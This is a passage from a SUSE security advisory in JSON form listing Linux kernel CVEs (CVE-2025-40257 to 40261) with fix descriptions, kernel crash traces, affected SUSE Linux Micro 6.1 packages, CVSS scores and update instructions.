NF_HOOK+0x30c/0x3a0 include/linux/netfilter.h:318\n NF_HOOK+0x30c/0x3a0 include/linux/netfilter.h:318\n __netif_receive_skb_one_core net/core/dev.c:6079 [inline]\n __netif_receive_skb+0x143/0x380 net/core/dev.c:6192\n process_backlog+0x31e/0x900 net/core/dev.c:6544\n __napi_poll+0xb6/0x540 net/core/dev.c:7594\n napi_poll net/core/dev.c:7657 [inline]\n net_rx_action+0x5f7/0xda0 net/core/dev.c:7784\n handle_softirqs+0x22f/0x710 kernel/softirq.c:622\n __do_softirq kernel/softirq.c:656 [inline]\n __local_bh_enable_ip+0x1a0/0x2e0 kernel/softirq.c:302\n mptcp_pm_send_ack net/mptcp/pm.c:210 [inline]\n mptcp_pm_addr_send_ack+0x41f/0x500 net/mptcp/pm.c:-1\n mptcp_pm_worker+0x174/0x320 net/mptcp/pm.c:1002\n mptcp_worker+0xd5/0x1170 net/mptcp/protocol.c:2762\n process_one_work kernel/workqueue.c:3263 [inline]\n process_scheduled_works+0xae1/0x17b0 kernel/workqueue.c:3346\n worker_thread+0x8a0/0xda0 kernel/workqueue.c:3427\n kthread+0x711/0x8a0 kernel/kthread.c:463\n ret_from_fork+0x4bc/0x870 arch/x86/kernel/process.c:158\n ret_from_fork_asm+0x1a/0x30 arch/x86/entry/entry_64.S:245\n \u003c/TASK\u003e\n\nAllocated by task 44:\n kasan_save_stack mm/kasan/common.c:56 [inline]\n kasan_save_track+0x3e/0x80 mm/kasan/common.c:77\n poison_kmalloc_redzone mm/kasan/common.c:400 [inline]\n __kasan_kmalloc+0x93/0xb0 mm/kasan/common.c:417\n kasan_kmalloc include/linux/kasan.h:262 [inline]\n __kmalloc_cache_noprof+0x1ef/0x6c0 mm/slub.c:5748\n kmalloc_noprof include/linux/slab.h:957 [inline]\n mptcp_pm_alloc_anno_list+0x104/0x460 net/mptcp/pm.c:385\n mptcp_pm_create_subflow_or_signal_addr+0xf9d/0x1360 net/mptcp/pm_kernel.c:355\n mptcp_pm_nl_fully_established net/mptcp/pm_kernel.c:409 [inline]\n __mptcp_pm_kernel_worker+0x417/0x1ef0 net/mptcp/pm_kernel.c:1529\n mptcp_pm_worker+0x1ee/0x320 net/mptcp/pm.c:1008\n mptcp_worker+0xd5/0x1170 net/mptcp/protocol.c:2762\n process_one_work kernel/workqueue.c:3263 [inline]\n process_scheduled_works+0xae1/0x17b0 kernel/workqueue.c:3346\n worker_thread+0x8a0/0xda0 kernel/workqueue.c:3427\n kthread+0x711/0x8a0 kernel/kthread.c:463\n ret_from_fork+0x4bc/0x870 arch/x86/kernel/process.c:158\n ret_from_fork_asm+0x1a/0x30 arch/x86/entry/entry_64.S:245\n\nFreed by task 6630:\n kasan_save_stack mm/kasan/common.c:56 [inline]\n kasan_save_track+0x3e/0x80 mm/kasan/common.c:77\n __kasan_save_free_info+0x46/0x50 mm/kasan/generic.c:587\n kasan_save_free_info mm/kasan/kasan.h:406 [inline]\n poison_slab_object m\n---truncated---",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40257",
"url": "https://www.suse.com/security/cve/CVE-2025-40257"
},
{
"category": "external",
"summary": "SUSE Bug 1254842 for CVE-2025-40257",
"url": "https://bugzilla.suse.com/1254842"
},
{
"category": "external",
"summary": "SUSE Bug 1257242 for CVE-2025-40257",
"url": "https://bugzilla.suse.com/1257242"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "important"
}
],
"title": "CVE-2025-40257"
},
{
"cve": "CVE-2025-40258",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40258"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nmptcp: fix race condition in mptcp_schedule_work()\n\nsyzbot reported use-after-free in mptcp_schedule_work() [1]\n\nIssue here is that mptcp_schedule_work() schedules a work,\nthen gets a refcount on sk-\u003esk_refcnt if the work was scheduled.\nThis refcount will be released by mptcp_worker().\n\n[A] if (schedule_work(...)) {\n[B] sock_hold(sk);\n return true;\n }\n\nProblem is that mptcp_worker() can run immediately and complete before [B]\n\nWe need instead :\n\n sock_hold(sk);\n if (schedule_work(...))\n return true;\n sock_put(sk);\n\n[1]\nrefcount_t: addition on 0; use-after-free.\n WARNING: CPU: 1 PID: 29 at lib/refcount.c:25 refcount_warn_saturate+0xfa/0x1d0 lib/refcount.c:25\nCall Trace:\n \u003cTASK\u003e\n __refcount_add include/linux/refcount.h:-1 [inline]\n __refcount_inc include/linux/refcount.h:366 [inline]\n refcount_inc include/linux/refcount.h:383 [inline]\n sock_hold include/net/sock.h:816 [inline]\n mptcp_schedule_work+0x164/0x1a0 net/mptcp/protocol.c:943\n mptcp_tout_timer+0x21/0xa0 net/mptcp/protocol.c:2316\n call_timer_fn+0x17e/0x5f0 kernel/time/timer.c:1747\n expire_timers kernel/time/timer.c:1798 [inline]\n __run_timers kernel/time/timer.c:2372 [inline]\n __run_timer_base+0x648/0x970 kernel/time/timer.c:2384\n run_timer_base kernel/time/timer.c:2393 [inline]\n run_timer_softirq+0xb7/0x180 kernel/time/timer.c:2403\n handle_softirqs+0x22f/0x710 kernel/softirq.c:622\n __do_softirq kernel/softirq.c:656 [inline]\n run_ktimerd+0xcf/0x190 kernel/softirq.c:1138\n smpboot_thread_fn+0x542/0xa60 kernel/smpboot.c:160\n kthread+0x711/0x8a0 kernel/kthread.c:463\n ret_from_fork+0x4bc/0x870 arch/x86/kernel/process.c:158\n ret_from_fork_asm+0x1a/0x30 arch/x86/entry/entry_64.S:245",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40258",
"url": "https://www.suse.com/security/cve/CVE-2025-40258"
},
{
"category": "external",
"summary": "SUSE Bug 1254843 for CVE-2025-40258",
"url": "https://bugzilla.suse.com/1254843"
},
{
"category": "external",
"summary": "SUSE Bug 1255053 for CVE-2025-40258",
"url": "https://bugzilla.suse.com/1255053"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "important"
}
],
"title": "CVE-2025-40258"
},
{
"cve": "CVE-2025-40259",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40259"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nscsi: sg: Do not sleep in atomic context\n\nsg_finish_rem_req() calls blk_rq_unmap_user(). The latter function may\nsleep. Hence, call sg_finish_rem_req() with interrupts enabled instead\nof disabled.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40259",
"url": "https://www.suse.com/security/cve/CVE-2025-40259"
},
{
"category": "external",
"summary": "SUSE Bug 1254845 for CVE-2025-40259",
"url": "https://bugzilla.suse.com/1254845"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2025-40259"
},
{
"cve": "CVE-2025-40261",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40261"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnvme: nvme-fc: Ensure -\u003eioerr_work is cancelled in nvme_fc_delete_ctrl()\n\nnvme_fc_delete_assocation() waits for pending I/O to complete before\nreturning, and an error can cause -\u003eioerr_work to be queued after\ncancel_work_sync() had been called. Move the call to cancel_work_sync() to\nbe after nvme_fc_delete_association() to ensure -\u003eioerr_work is not running\nwhen the nvme_fc_ctrl object is freed. Otherwise the following can occur:\n\n[ 1135.911754] list_del corruption, ff2d24c8093f31f8-\u003enext is NULL\n[ 1135.917705] ------------[ cut here ]------------\n[ 1135.922336] kernel BUG at lib/list_debug.c:52!\n[ 1135.926784] Oops: invalid opcode: 0000 [#1] SMP NOPTI\n[ 1135.931851] CPU: 48 UID: 0 PID: 726 Comm: kworker/u449:23 Kdump: loaded Not tainted 6.12.0 #1 PREEMPT(voluntary)\n[ 1135.943490] Hardware name: Dell Inc. PowerEdge R660/0HGTK9, BIOS 2.5.4 01/16/2025\n[ 1135.950969] Workqueue: 0x0 (nvme-wq)\n[ 1135.954673] RIP: 0010:__list_del_entry_valid_or_report.cold+0xf/0x6f\n[ 1135.961041] Code: c7 c7 98 68 72 94 e8 26 45 fe ff 0f 0b 48 c7 c7 70 68 72 94 e8 18 45 fe ff 0f 0b 48 89 fe 48 c7 c7 80 69 72 94 e8 07 45 fe ff \u003c0f\u003e 0b 48 89 d1 48 c7 c7 a0 6a 72 94 48 89 c2 e8 f3 44 fe ff 0f 0b\n[ 1135.979788] RSP: 0018:ff579b19482d3e50 EFLAGS: 00010046\n[ 1135.985015] RAX: 0000000000000033 RBX: ff2d24c8093f31f0 RCX: 0000000000000000\n[ 1135.992148] RDX: 0000000000000000 RSI: ff2d24d6bfa1d0c0 RDI: ff2d24d6bfa1d0c0\n[ 1135.999278] RBP: ff2d24c8093f31f8 R08: 0000000000000000 R09: ffffffff951e2b08\n[ 1136.006413] R10: ffffffff95122ac8 R11: 0000000000000003 R12: ff2d24c78697c100\n[ 1136.013546] R13: fffffffffffffff8 R14: 0000000000000000 R15: ff2d24c78697c0c0\n[ 1136.020677] FS: 0000000000000000(0000) GS:ff2d24d6bfa00000(0000) knlGS:0000000000000000\n[ 1136.028765] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033\n[ 1136.034510] CR2: 00007fd207f90b80 CR3: 000000163ea22003 CR4: 0000000000f73ef0\n[ 1136.041641] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000\n[ 1136.048776] DR3: 0000000000000000 DR6: 00000000fffe07f0 DR7: 0000000000000400\n[ 1136.055910] PKRU: 55555554\n[ 1136.058623] Call Trace:\n[ 1136.061074] \u003cTASK\u003e\n[ 1136.063179] ? show_trace_log_lvl+0x1b0/0x2f0\n[ 1136.067540] ? show_trace_log_lvl+0x1b0/0x2f0\n[ 1136.071898] ? move_linked_works+0x4a/0xa0\n[ 1136.075998] ? __list_del_entry_valid_or_report.cold+0xf/0x6f\n[ 1136.081744] ? __die_body.cold+0x8/0x12\n[ 1136.085584] ? die+0x2e/0x50\n[ 1136.088469] ? do_trap+0xca/0x110\n[ 1136.091789] ? do_error_trap+0x65/0x80\n[ 1136.095543] ? __list_del_entry_valid_or_report.cold+0xf/0x6f\n[ 1136.101289] ? exc_invalid_op+0x50/0x70\n[ 1136.105127] ? __list_del_entry_valid_or_report.cold+0xf/0x6f\n[ 1136.110874] ? asm_exc_invalid_op+0x1a/0x20\n[ 1136.115059] ? __list_del_entry_valid_or_report.cold+0xf/0x6f\n[ 1136.120806] move_linked_works+0x4a/0xa0\n[ 1136.124733] worker_thread+0x216/0x3a0\n[ 1136.128485] ? __pfx_worker_thread+0x10/0x10\n[ 1136.132758] kthread+0xfa/0x240\n[ 1136.135904] ? __pfx_kthread+0x10/0x10\n[ 1136.139657] ret_from_fork+0x31/0x50\n[ 1136.143236] ? __pfx_kthread+0x10/0x10\n[ 1136.146988] ret_from_fork_asm+0x1a/0x30\n[ 1136.150915] \u003c/TASK\u003e",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40261",
"url": "https://www.suse.com/security/cve/CVE-2025-40261"
},
{
"category": "external",
"summary": "SUSE Bug 1254839 for CVE-2025-40261",
"url": "https://bugzilla.suse.com/1254839"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2025-40261"
